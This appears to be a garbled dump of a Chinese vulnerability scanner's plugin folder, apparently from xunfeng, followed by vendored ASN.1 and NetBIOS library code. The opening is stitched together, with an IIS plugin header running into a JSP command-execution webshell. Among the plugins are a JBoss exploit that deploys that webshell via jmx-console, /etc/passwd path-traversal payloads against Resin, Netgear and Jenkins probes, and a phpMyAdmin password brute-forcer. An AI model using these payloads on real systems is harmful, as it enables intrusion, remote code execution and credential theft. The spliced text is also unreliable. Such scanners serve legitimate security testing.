1 | # coding=utf-8
2 | import socket
3 | import time
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "IIS WebDav RCE",
9 | "info": "CVE-2017-7269,Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <% %> <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "
"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> """
36 | # s1.recv(1024)
37 | shellcode = ""
38 | name = random_str(5)
39 | for v in shell:
40 | shellcode += hex(ord(v)).replace("0x", "%")
41 | flag = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=" + \
42 | "java.lang.String&arg0=%s.war&argType=java.lang.String&arg1=xunfeng&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" % (
43 | name) + shellcode + \
44 | "&argType=boolean&arg4=True HTTP/1.0\r\n\r\n"
45 | s1.send(flag)
46 | data = s1.recv(512)
47 | s1.close()
48 | time.sleep(10)
49 | url = "http://%s:%d" % (host, int(port))
50 | webshell_url = "%s/%s/xunfeng.jsp" % (url, name)
51 | res = urllib2.urlopen(webshell_url, timeout=timeout)
52 | if 'comments' in res.read():
53 | info = u"Jboss Authentication bypass webshell:%s" % (webshell_url)
54 | return info
55 | except Exception, e:
56 | pass
57 |
--------------------------------------------------------------------------------
/celerynode/vuldb/jboss_info.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : "信息泄露",
3 | "name" : "Jboss信息泄露",
4 | "level" : "低危",
5 | "type" : "信息泄露",
6 | "author" : "wolf@YSRC",
7 | "url": "",
8 | "keyword" : "tag:jboss",
9 | "source" : 1,
10 | "plugin" : {
11 | "url" : "/status?full=true",
12 | "tag" : "存在信息泄露漏洞",
13 | "analyzing" : "keyword",
14 | "analyzingdata" : "Max processing time",
15 | "data" : "",
16 | "method" : "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/jenkins_unauth.json:
--------------------------------------------------------------------------------
1 | {
2 | "name" : "Jenkins代码执行",
3 | "info" : "Jenkins未授权访问,攻击者可利用此漏洞执行系统命令",
4 | "level" : "紧急",
5 | "type" : "代码执行",
6 | "author" : "wolf@YSRC",
7 | "url": "",
8 | "keyword" : "tag:jenkins",
9 | "source" : 1,
10 | "plugin" : {
11 | "url" : "/",
12 | "tag" : "Jenkins /Script 代码执行",
13 | "analyzing" : "keyword",
14 | "analyzingdata" : "task-link",
15 | "data" : "",
16 | "method" : "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/jetty_refer.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import socket
3 |
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "Jetty 共享缓存区远程泄露",
8 | "info": "攻击者可利用此漏洞获取其他用户的请求信息,进而获取其权限",
9 | "level": "中危",
10 | "type": "信息泄露",
11 | "author": "wolf@YSRC",
12 | "url": "https://www.secpulse.com/archives/4911.html",
13 | "keyword": "tag:jetty",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip, port, timeout):
20 | try:
21 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
22 | s.settimeout(timeout)
23 | s.connect((ip, int(port)))
24 | flag = "GET / HTTP/1.1\r\nReferer:%s\r\n\r\n" % (chr(0) * 15)
25 | s.send(flag)
26 | data = s.recv(512)
27 | s.close()
28 | if 'state=HEADER_VALUE' in data and '400' in data:
29 | return u"jetty 共享缓存区远程泄露漏洞"
30 | except:
31 | pass
32 |
--------------------------------------------------------------------------------
/celerynode/vuldb/memcache_unauth.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import socket
3 |
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "Memcache未授权访问",
8 | "info": "导致数据库敏感信息泄露。",
9 | "level": "中危",
10 | "type": "未授权访问",
11 | "author": "wolf@YSRC",
12 | "url": "",
13 | "keyword": "server:memcache",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip, port, timeout):
20 | try:
21 | socket.setdefaulttimeout(timeout)
22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | s.connect((ip, int(port)))
24 | s.send("stats\r\n")
25 | result = s.recv(1024)
26 | if "STAT version" in result:
27 | return u"未授权访问"
28 | except Exception, e:
29 | pass
30 |
--------------------------------------------------------------------------------
/celerynode/vuldb/netgear_passwd.json:
--------------------------------------------------------------------------------
1 | {"info": "NETGEAR\u8def\u7531\u5668\u591a\u4e2a\u7cfb\u5217\u5b58\u5728\u5bc6\u7801\u6cc4\u9732\u6f0f\u6d1e\uff08CVE-2017-5521\uff09", "source": 1, "name": "Netgear\u5bc6\u7801\u6cc4\u9732", "keyword": "banner:NETGEAR", "level": "\u9ad8\u5371", "url": "https://www.seebug.org/vuldb/ssvid-92639", "author": "wolf@YSRC", "type": "\u4fe1\u606f\u6cc4\u9732", "plugin": {"url": "/passwordrecovered.cgi?id=get_rekt", "tag": "\u6f0f\u6d1eURL\uff1a/passwordrecovered.cgi?id=get_rekt", "analyzing": "keyword", "analyzingdata": "class=\"MNUText\" align=\"left\">", "data": "", "method": "GET"}}
--------------------------------------------------------------------------------
/celerynode/vuldb/nmb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/celerynode/vuldb/nmb/__init__.py
--------------------------------------------------------------------------------
/celerynode/vuldb/nmb/nmb_constants.py:
--------------------------------------------------------------------------------
1 |
2 | # Default port for NetBIOS name service
3 | NETBIOS_NS_PORT = 137
4 |
5 | # Default port for NetBIOS session service
6 | NETBIOS_SESSION_PORT = 139
7 |
8 | # Owner Node Type Constants
9 | NODE_B = 0x00
10 | NODE_P = 0x01
11 | NODE_M = 0x10
12 | NODE_RESERVED = 0x11
13 |
14 | # Name Type Constants
15 | TYPE_UNKNOWN = 0x01
16 | TYPE_WORKSTATION = 0x00
17 | TYPE_CLIENT = 0x03
18 | TYPE_SERVER = 0x20
19 | TYPE_DOMAIN_MASTER = 0x1B
20 | TYPE_MASTER_BROWSER = 0x1D
21 | TYPE_BROWSER = 0x1E
22 |
23 | TYPE_NAMES = { TYPE_UNKNOWN: 'Unknown',
24 | TYPE_WORKSTATION: 'Workstation',
25 | TYPE_CLIENT: 'Client',
26 | TYPE_SERVER: 'Server',
27 | TYPE_MASTER_BROWSER: 'Master Browser',
28 | TYPE_BROWSER: 'Browser Server',
29 | TYPE_DOMAIN_MASTER: 'Domain Master'
30 | }
31 |
32 | # Values for Session Packet Type field in Session Packets
33 | SESSION_MESSAGE = 0x00
34 | SESSION_REQUEST = 0x81
35 | POSITIVE_SESSION_RESPONSE = 0x82
36 | NEGATIVE_SESSION_RESPONSE = 0x83
37 | REGTARGET_SESSION_RESPONSE = 0x84
38 | SESSION_KEEPALIVE = 0x85
39 |
--------------------------------------------------------------------------------
/celerynode/vuldb/nmb/nmb_structs.py:
--------------------------------------------------------------------------------
1 |
2 | import struct
3 |
4 | class NMBError(Exception): pass
5 |
6 |
7 | class NotConnectedError(NMBError):
8 | """
9 | Raisd when the underlying NMB connection has been disconnected or not connected yet
10 | """
11 | pass
12 |
13 |
14 | class NMBSessionMessage:
15 |
16 | HEADER_STRUCT_FORMAT = '>BBH'
17 | HEADER_STRUCT_SIZE = struct.calcsize(HEADER_STRUCT_FORMAT)
18 |
19 | def __init__(self):
20 | self.reset()
21 |
22 | def reset(self):
23 | self.type = 0
24 | self.flags = 0
25 | self.data = ''
26 |
27 | def decode(self, data, offset):
28 | data_len = len(data)
29 |
30 | if data_len < offset + self.HEADER_STRUCT_SIZE:
31 | # Not enough data for decoding
32 | return 0
33 |
34 | self.reset()
35 | self.type, self.flags, length = struct.unpack(self.HEADER_STRUCT_FORMAT, data[offset:offset+self.HEADER_STRUCT_SIZE])
36 |
37 | if self.flags & 0x01:
38 | length |= 0x010000
39 |
40 | if data_len < offset + self.HEADER_STRUCT_SIZE + length:
41 | return 0
42 |
43 | self.data = data[offset+self.HEADER_STRUCT_SIZE:offset+self.HEADER_STRUCT_SIZE+length]
44 | return self.HEADER_STRUCT_SIZE + length
45 |
46 |
47 | class DirectTCPSessionMessage(NMBSessionMessage):
48 |
49 | HEADER_STRUCT_FORMAT = '>I'
50 | HEADER_STRUCT_SIZE = struct.calcsize(HEADER_STRUCT_FORMAT)
51 |
52 | def decode(self, data, offset):
53 | data_len = len(data)
54 |
55 | if data_len < offset + self.HEADER_STRUCT_SIZE:
56 | # Not enough data for decoding
57 | return 0
58 |
59 | self.reset()
60 | length = struct.unpack(self.HEADER_STRUCT_FORMAT, data[offset:offset+self.HEADER_STRUCT_SIZE])[0]
61 |
62 | if length >> 24 != 0:
63 | raise NMBError("Invalid protocol header for Direct TCP session message")
64 |
65 | if data_len < offset + self.HEADER_STRUCT_SIZE + length:
66 | return 0
67 |
68 | self.data = data[offset+self.HEADER_STRUCT_SIZE:offset+self.HEADER_STRUCT_SIZE+length]
69 | return self.HEADER_STRUCT_SIZE + length
70 |
--------------------------------------------------------------------------------
/celerynode/vuldb/nmb/utils.py:
--------------------------------------------------------------------------------
1 |
2 | import string, re
3 |
4 |
5 | def encode_name(name, type, scope = None):
6 | """
7 | Perform first and second level encoding of name as specified in RFC 1001 (Section 4)
8 | """
9 | if name == '*':
10 | name = name + '\0' * 15
11 | elif len(name) > 15:
12 | name = name[:15] + chr(type)
13 | else:
14 | name = string.ljust(name, 15) + chr(type)
15 |
16 | def _do_first_level_encoding(m):
17 | s = ord(m.group(0))
18 | return string.uppercase[s >> 4] + string.uppercase[s & 0x0f]
19 |
20 | encoded_name = chr(len(name) * 2) + re.sub('.', _do_first_level_encoding, name)
21 | if scope:
22 | encoded_scope = ''
23 | for s in string.split(scope, '.'):
24 | encoded_scope = encoded_scope + chr(len(s)) + s
25 | return encoded_name + encoded_scope + '\0'
26 | else:
27 | return encoded_name + '\0'
28 |
29 |
30 | def decode_name(name):
31 | name_length = ord(name[0])
32 | assert name_length == 32
33 |
34 | def _do_first_level_decoding(m):
35 | s = m.group(0)
36 | return chr(((ord(s[0]) - ord('A')) << 4) | (ord(s[1]) - ord('A')))
37 |
38 | decoded_name = re.sub('..', _do_first_level_decoding, name[1:33])
39 | if name[33] == '\0':
40 | return 34, decoded_name, ''
41 | else:
42 | decoded_domain = ''
43 | offset = 34
44 | while 1:
45 | domain_length = ord(name[offset])
46 | if domain_length == 0:
47 | break
48 | decoded_domain = '.' + name[offset:offset + domain_length]
49 | offset = offset + domain_length
50 | return offset + 1, decoded_name, decoded_domain
51 |
--------------------------------------------------------------------------------
/celerynode/vuldb/phpmyadmin_crackpass.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import urllib2
3 | import re
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "phpMyAdmin弱口令",
8 | "info": "导致数据库敏感信息泄露,严重可导致服务器被入侵控制。",
9 | "level": "高危",
10 | "type": "弱口令",
11 | "author": "wolf@YSRC",
12 | "url": "",
13 | "keyword": "tag:phpmyadmin",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip, port, timeout):
20 | flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">',
21 | 'class="disableAjax" title=']
22 | user_list = ['root', 'mysql', 'www', 'bbs', 'wwwroot', 'bak', 'backup']
23 | error_i = 0
24 | try:
25 | res_html = urllib2.urlopen('http://' + ip + ":" + str(port), timeout=timeout).read()
26 | if 'input_password' in res_html and 'name="token"' in res_html:
27 | url = 'http://' + ip + ":" + str(port) + "/index.php"
28 | else:
29 | res_html = urllib2.urlopen('http://' + ip + ":" + str(port) + "/phpmyadmin", timeout=timeout).read()
30 | if 'input_password' in res_html and 'name="token"' in res_html:
31 | url = 'http://' + ip + ":" + str(port) + "/phpmyadmin/index.php"
32 | else:
33 | return
34 | except:
35 | pass
36 | for user in user_list:
37 | for password in PASSWORD_DIC:
38 | try:
39 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
40 | res_html = opener.open(url, timeout=timeout).read()
41 | token = re.search('name="token" value="(.*?)" />', res_html)
42 | token_hash = urllib2.quote(token.group(1))
43 | postdata = "pma_username=%s&pma_password=%s&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci&token=%s" % (
44 | user, password, token_hash)
45 | res = opener.open(url,postdata, timeout=timeout)
46 | res_html = res.read()
47 | for flag in flag_list:
48 | if flag in res_html:
49 | return u'phpmyadmin弱口令,账号:%s 密码:%s' % (user, password)
50 | except urllib2.URLError, e:
51 | error_i += 1
52 | if error_i >= 3: return
53 | except Exception,e:
54 | return
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/__init__.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | # http://www.python.org/dev/peps/pep-0396/
4 | __version__ = '0.1.9'
5 |
6 | if sys.version_info[:2] < (2, 4):
7 | raise RuntimeError('PyASN1 requires Python 2.4 or later')
8 |
9 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/codec/__init__.py:
--------------------------------------------------------------------------------
1 | # This file is necessary to make this directory a package.
2 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/codec/ber/__init__.py:
--------------------------------------------------------------------------------
1 | # This file is necessary to make this directory a package.
2 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/codec/ber/eoo.py:
--------------------------------------------------------------------------------
1 | from pyasn1.type import base, tag
2 |
3 | class EndOfOctets(base.AbstractSimpleAsn1Item):
4 | defaultValue = 0
5 | tagSet = tag.initTagSet(
6 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x00)
7 | )
8 | endOfOctets = EndOfOctets()
9 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/codec/cer/__init__.py:
--------------------------------------------------------------------------------
1 | # This file is necessary to make this directory a package.
2 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/codec/cer/decoder.py:
--------------------------------------------------------------------------------
1 | # CER decoder
2 | from pyasn1.type import univ
3 | from pyasn1.codec.ber import decoder
4 | from pyasn1.compat.octets import oct2int
5 | from pyasn1 import error
6 |
7 | class BooleanDecoder(decoder.AbstractSimpleDecoder):
8 | protoComponent = univ.Boolean(0)
9 | def valueDecoder(self, fullSubstrate, substrate, asn1Spec, tagSet, length,
10 | state, decodeFun, substrateFun):
11 | head, tail = substrate[:length], substrate[length:]
12 | if not head or length != 1:
13 | raise error.PyAsn1Error('Not single-octet Boolean payload')
14 | byte = oct2int(head[0])
15 | # CER/DER specifies encoding of TRUE as 0xFF and FALSE as 0x0, while
16 | # BER allows any non-zero value as TRUE; cf. sections 8.2.2. and 11.1
17 | # in http://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf
18 | if byte == 0xff:
19 | value = 1
20 | elif byte == 0x00:
21 | value = 0
22 | else:
23 | raise error.PyAsn1Error('Unexpected Boolean payload: %s' % byte)
24 | return self._createComponent(asn1Spec, tagSet, value), tail
25 |
26 | tagMap = decoder.tagMap.copy()
27 | tagMap.update({
28 | univ.Boolean.tagSet: BooleanDecoder()
29 | })
30 |
31 | typeMap = decoder.typeMap
32 |
33 | class Decoder(decoder.Decoder): pass
34 |
35 | decode = Decoder(tagMap, decoder.typeMap)
36 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/codec/der/__init__.py:
--------------------------------------------------------------------------------
1 | # This file is necessary to make this directory a package.
2 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/codec/der/decoder.py:
--------------------------------------------------------------------------------
1 | # DER decoder
2 | from pyasn1.codec.cer import decoder
3 |
4 | tagMap = decoder.tagMap
5 | typeMap = decoder.typeMap
6 | class Decoder(decoder.Decoder):
7 | supportIndefLength = False
8 |
9 | decode = Decoder(tagMap, typeMap)
10 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/codec/der/encoder.py:
--------------------------------------------------------------------------------
1 | # DER encoder
2 | from pyasn1.type import univ
3 | from pyasn1.codec.cer import encoder
4 | from pyasn1 import error
5 |
6 | class SetOfEncoder(encoder.SetOfEncoder):
7 | def _cmpSetComponents(self, c1, c2):
8 | tagSet1 = isinstance(c1, univ.Choice) and \
9 | c1.getEffectiveTagSet() or c1.getTagSet()
10 | tagSet2 = isinstance(c2, univ.Choice) and \
11 | c2.getEffectiveTagSet() or c2.getTagSet()
12 | return cmp(tagSet1, tagSet2)
13 |
14 | tagMap = encoder.tagMap.copy()
15 | tagMap.update({
16 | # Overload CER encoders with BER ones (a bit hackerish XXX)
17 | univ.BitString.tagSet: encoder.encoder.BitStringEncoder(),
18 | univ.OctetString.tagSet: encoder.encoder.OctetStringEncoder(),
19 | # Set & SetOf have same tags
20 | univ.SetOf().tagSet: SetOfEncoder()
21 | })
22 |
23 | typeMap = encoder.typeMap
24 |
25 | class Encoder(encoder.Encoder):
26 | supportIndefLength = False
27 | def __call__(self, client, defMode=True, maxChunkSize=0):
28 | if not defMode:
29 | raise error.PyAsn1Error('DER forbids indefinite length mode')
30 | return encoder.Encoder.__call__(self, client, defMode, maxChunkSize)
31 |
32 | encode = Encoder(tagMap, typeMap)
33 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/compat/__init__.py:
--------------------------------------------------------------------------------
1 | # This file is necessary to make this directory a package.
2 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/compat/binary.py:
--------------------------------------------------------------------------------
1 | from sys import version_info
2 |
3 | if version_info[0:2] < (2, 6):
4 | def bin(x):
5 | if x <= 1:
6 | return '0b'+str(x)
7 | else:
8 | return bin(x>>1) + str(x&1)
9 | else:
10 | bin = bin
11 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/compat/octets.py:
--------------------------------------------------------------------------------
1 | from sys import version_info
2 |
3 | if version_info[0] <= 2:
4 | int2oct = chr
5 | ints2octs = lambda s: ''.join([ int2oct(x) for x in s ])
6 | null = ''
7 | oct2int = ord
8 | octs2ints = lambda s: [ oct2int(x) for x in s ]
9 | str2octs = lambda x: x
10 | octs2str = lambda x: x
11 | isOctetsType = lambda s: isinstance(s, str)
12 | isStringType = lambda s: isinstance(s, (str, unicode))
13 | else:
14 | ints2octs = bytes
15 | int2oct = lambda x: ints2octs((x,))
16 | null = ints2octs()
17 | oct2int = lambda x: x
18 | octs2ints = lambda s: [ x for x in s ]
19 | str2octs = lambda x: x.encode()
20 | octs2str = lambda x: x.decode()
21 | isOctetsType = lambda s: isinstance(s, bytes)
22 | isStringType = lambda s: isinstance(s, str)
23 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/error.py:
--------------------------------------------------------------------------------
1 | class PyAsn1Error(Exception): pass
2 | class ValueConstraintError(PyAsn1Error): pass
3 | class SubstrateUnderrunError(PyAsn1Error): pass
4 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/type/__init__.py:
--------------------------------------------------------------------------------
1 | # This file is necessary to make this directory a package.
2 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/type/char.py:
--------------------------------------------------------------------------------
1 | # ASN.1 "character string" types
2 | from pyasn1.type import univ, tag
3 |
4 | class NumericString(univ.OctetString):
5 | tagSet = univ.OctetString.tagSet.tagImplicitly(
6 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 18)
7 | )
8 |
9 | class PrintableString(univ.OctetString):
10 | tagSet = univ.OctetString.tagSet.tagImplicitly(
11 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 19)
12 | )
13 |
14 | class TeletexString(univ.OctetString):
15 | tagSet = univ.OctetString.tagSet.tagImplicitly(
16 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 20)
17 | )
18 |
19 | class T61String(TeletexString): pass
20 |
21 | class VideotexString(univ.OctetString):
22 | tagSet = univ.OctetString.tagSet.tagImplicitly(
23 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 21)
24 | )
25 |
26 | class IA5String(univ.OctetString):
27 | tagSet = univ.OctetString.tagSet.tagImplicitly(
28 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 22)
29 | )
30 |
31 | class GraphicString(univ.OctetString):
32 | tagSet = univ.OctetString.tagSet.tagImplicitly(
33 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 25)
34 | )
35 |
36 | class VisibleString(univ.OctetString):
37 | tagSet = univ.OctetString.tagSet.tagImplicitly(
38 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 26)
39 | )
40 |
41 | class ISO646String(VisibleString): pass
42 |
43 | class GeneralString(univ.OctetString):
44 | tagSet = univ.OctetString.tagSet.tagImplicitly(
45 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 27)
46 | )
47 |
48 | class UniversalString(univ.OctetString):
49 | tagSet = univ.OctetString.tagSet.tagImplicitly(
50 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 28)
51 | )
52 | encoding = "utf-32-be"
53 |
54 | class BMPString(univ.OctetString):
55 | tagSet = univ.OctetString.tagSet.tagImplicitly(
56 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 30)
57 | )
58 | encoding = "utf-16-be"
59 |
60 | class UTF8String(univ.OctetString):
61 | tagSet = univ.OctetString.tagSet.tagImplicitly(
62 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 12)
63 | )
64 | encoding = "utf-8"
65 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/type/error.py:
--------------------------------------------------------------------------------
1 | from pyasn1.error import PyAsn1Error
2 |
3 | class ValueConstraintError(PyAsn1Error): pass
4 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/type/namedval.py:
--------------------------------------------------------------------------------
1 | # ASN.1 named integers
2 | from pyasn1 import error
3 |
4 | __all__ = [ 'NamedValues' ]
5 |
6 | class NamedValues:
7 | def __init__(self, *namedValues):
8 | self.nameToValIdx = {}; self.valToNameIdx = {}
9 | self.namedValues = ()
10 | automaticVal = 1
11 | for namedValue in namedValues:
12 | if isinstance(namedValue, tuple):
13 | name, val = namedValue
14 | else:
15 | name = namedValue
16 | val = automaticVal
17 | if name in self.nameToValIdx:
18 | raise error.PyAsn1Error('Duplicate name %s' % (name,))
19 | self.nameToValIdx[name] = val
20 | if val in self.valToNameIdx:
21 | raise error.PyAsn1Error('Duplicate value %s=%s' % (name, val))
22 | self.valToNameIdx[val] = name
23 | self.namedValues = self.namedValues + ((name, val),)
24 | automaticVal = automaticVal + 1
25 |
26 | def __repr__(self):
27 | return '%s(%s)' % (self.__class__.__name__, ', '.join([repr(x) for x in self.namedValues]))
28 |
29 | def __str__(self): return str(self.namedValues)
30 |
31 | def __eq__(self, other): return tuple(self) == tuple(other)
32 | def __ne__(self, other): return tuple(self) != tuple(other)
33 | def __lt__(self, other): return tuple(self) < tuple(other)
34 | def __le__(self, other): return tuple(self) <= tuple(other)
35 | def __gt__(self, other): return tuple(self) > tuple(other)
36 | def __ge__(self, other): return tuple(self) >= tuple(other)
37 | def __hash__(self): return hash(tuple(self))
38 |
39 | def getName(self, value):
40 | if value in self.valToNameIdx:
41 | return self.valToNameIdx[value]
42 |
43 | def getValue(self, name):
44 | if name in self.nameToValIdx:
45 | return self.nameToValIdx[name]
46 |
47 | def __getitem__(self, i): return self.namedValues[i]
48 | def __len__(self): return len(self.namedValues)
49 |
50 | def __add__(self, namedValues):
51 | return self.__class__(*self.namedValues + namedValues)
52 | def __radd__(self, namedValues):
53 | return self.__class__(*namedValues + tuple(self))
54 |
55 | def clone(self, *namedValues):
56 | return self.__class__(*tuple(self) + namedValues)
57 |
58 | # XXX clone/subtype?
59 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/type/tagmap.py:
--------------------------------------------------------------------------------
1 | from pyasn1 import error
2 |
3 | class TagMap:
4 | def __init__(self, posMap={}, negMap={}, defType=None):
5 | self.__posMap = posMap.copy()
6 | self.__negMap = negMap.copy()
7 | self.__defType = defType
8 |
9 | def __contains__(self, tagSet):
10 | return tagSet in self.__posMap or \
11 | self.__defType is not None and tagSet not in self.__negMap
12 |
13 | def __getitem__(self, tagSet):
14 | if tagSet in self.__posMap:
15 | return self.__posMap[tagSet]
16 | elif tagSet in self.__negMap:
17 | raise error.PyAsn1Error('Key in negative map')
18 | elif self.__defType is not None:
19 | return self.__defType
20 | else:
21 | raise KeyError()
22 |
23 | def __repr__(self):
24 | s = self.__class__.__name__ + '('
25 | if self.__posMap:
26 | s = s + 'posMap=%r, ' % (self.__posMap,)
27 | if self.__negMap:
28 | s = s + 'negMap=%r, ' % (self.__negMap,)
29 | if self.__defType is not None:
30 | s = s + 'defType=%r' % (self.__defType,)
31 | return s + ')'
32 |
33 | def __str__(self):
34 | s = self.__class__.__name__ + ':\n'
35 | if self.__posMap:
36 | s = s + 'posMap:\n%s, ' % ',\n '.join([ x.prettyPrintType() for x in self.__posMap.values()])
37 | if self.__negMap:
38 | s = s + 'negMap:\n%s, ' % ',\n '.join([ x.prettyPrintType() for x in self.__negMap.values()])
39 | if self.__defType is not None:
40 | s = s + 'defType:\n%s, ' % self.__defType.prettyPrintType()
41 | return s
42 |
43 | def clone(self, parentType, tagMap, uniq=False):
44 | if self.__defType is not None and tagMap.getDef() is not None:
45 | raise error.PyAsn1Error('Duplicate default value at %s' % (self,))
46 | if tagMap.getDef() is not None:
47 | defType = tagMap.getDef()
48 | else:
49 | defType = self.__defType
50 |
51 | posMap = self.__posMap.copy()
52 | for k in tagMap.getPosMap():
53 | if uniq and k in posMap:
54 | raise error.PyAsn1Error('Duplicate positive key %s' % (k,))
55 | posMap[k] = parentType
56 |
57 | negMap = self.__negMap.copy()
58 | negMap.update(tagMap.getNegMap())
59 |
60 | return self.__class__(
61 | posMap, negMap, defType,
62 | )
63 |
64 | def getPosMap(self): return self.__posMap.copy()
65 | def getNegMap(self): return self.__negMap.copy()
66 | def getDef(self): return self.__defType
67 |
--------------------------------------------------------------------------------
/celerynode/vuldb/pyasn1/type/useful.py:
--------------------------------------------------------------------------------
1 | # ASN.1 "useful" types
2 | from pyasn1.type import char, tag
3 |
4 | class ObjectDescriptor(char.GraphicString):
5 | tagSet = char.GraphicString.tagSet.tagImplicitly(
6 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 7)
7 | )
8 |
9 | class GeneralizedTime(char.VisibleString):
10 | tagSet = char.VisibleString.tagSet.tagImplicitly(
11 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 24)
12 | )
13 |
14 | class UTCTime(char.VisibleString):
15 | tagSet = char.VisibleString.tagSet.tagImplicitly(
16 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 23)
17 | )
18 |
--------------------------------------------------------------------------------
/celerynode/vuldb/resin_fileread.json:
--------------------------------------------------------------------------------
1 | {
2 | "name" : "Resin任意文件读取_4",
3 | "info" : "可通过此漏洞读取服务器上的文件 examples",
4 | "level" : "高危",
5 | "type" : "文件读取",
6 | "author" : "wolf@YSRC",
7 | "url": "",
8 | "keyword" : "tag:resin",
9 | "source" : 1,
10 | "plugin" : {
11 | "url" : "/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
12 | "tag" : "存在任意文件读取漏洞 /resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../etc/passwd",
13 | "analyzing" : "keyword",
14 | "analyzingdata" : "root:",
15 | "data" : "",
16 | "method" : "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/resin_fileread_1.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : "可通过此漏洞读取服务器上的文件 resource",
3 | "name" : "Resin任意文件读取_1",
4 | "level" : "高危",
5 | "type" : "文件读取",
6 | "author" : "wolf@YSRC",
7 | "url": "",
8 | "keyword" : "tag:resin",
9 | "source" : 1,
10 | "plugin" : {
11 | "url" : "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
12 | "tag" : "存在任意文件读取漏洞 /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
13 | "analyzing" : "keyword",
14 | "analyzingdata" : "root:",
15 | "data" : "",
16 | "method" : "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/resin_fileread_3.json:
--------------------------------------------------------------------------------
1 | {
2 | "name" : "Resin任意文件读取_3",
3 | "info" : "Resin File Read And Directory Browsing Vul CVE:2007-2440",
4 | "level" : "高危",
5 | "type" : "文件读取",
6 | "author" : "wolf@YSRC",
7 | "url": "",
8 | "keyword" : "tag:resin",
9 | "source" : 1,
10 | "plugin" : {
11 | "url" : "/%20..\\\\web-inf",
12 | "tag" : "存在CVE:2007-2440漏洞",
13 | "analyzing" : "keyword",
14 | "analyzingdata" : "Directory of",
15 | "data" : "",
16 | "method" : "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/smb/SMBHandler.py:
--------------------------------------------------------------------------------
1 |
2 | import os, sys, socket, urllib2, mimetypes, mimetools, tempfile
3 | from urllib import (unwrap, unquote, splittype, splithost, quote,
4 | addinfourl, splitport, splittag,
5 | splitattr, ftpwrapper, splituser, splitpasswd, splitvalue)
6 | from nmb.NetBIOS import NetBIOS
7 | from smb.SMBConnection import SMBConnection
